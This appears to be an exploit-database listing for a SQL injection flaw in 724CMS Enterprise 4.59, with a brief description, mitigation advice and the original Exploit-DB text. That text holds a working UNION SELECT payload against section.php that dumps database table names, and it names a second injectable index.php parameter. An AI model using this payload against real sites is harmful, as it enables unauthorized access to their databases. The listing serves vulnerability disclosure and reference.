header-logo
Suggest Exploit
vendor:
724CMS Enterprise Version 4.59
by:
CoBRa_21
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: 724CMS Enterprise Version 4.59
Affected Version From: 4.59
Affected Version To: 4.59
Patch Exists: NO
Related CWE: N/A
CPE: 724cms.com
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

724CMS Enterprise Version 4.59 (section.php) SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a maliciously crafted SQL query to the vulnerable application. This can be done by sending a specially crafted HTTP request to the vulnerable application. The attacker can use the ‘union select’ statement to retrieve data from the database. The attacker can also use the ‘group_concat’ statement to retrieve multiple rows of data from the database.

Mitigation:

The application should use parameterized queries to prevent SQL injection attacks. The application should also use input validation to prevent malicious input from being processed by the application.
Source

Exploit-DB raw data:

-------------------------------------------------------------------------------------------

724CMS Enterprise Version 4.59 (section.php) SQL Injection Vulnerability

-------------------------------------------------------------------------------------------

Author: CoBRa_21

Mail: uyku_cu@windowslive.com

Script Name: 724CMS Enterprise Version 4.59

Download: http://724cms.com/

-------------------------------------------------------------------------------------------

Exploit:

http://localhost/[path]/section.php?Nav=Section&ID=-1 union select 0,1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from information_schema.tables--

http://localhost/[path]/index.php?auto_slide=&ID=-1 [SQL]

-------------------------------------------------------------------------------------------

Thanks cyberlog ;)

-------------------------------------------------------------------------------------------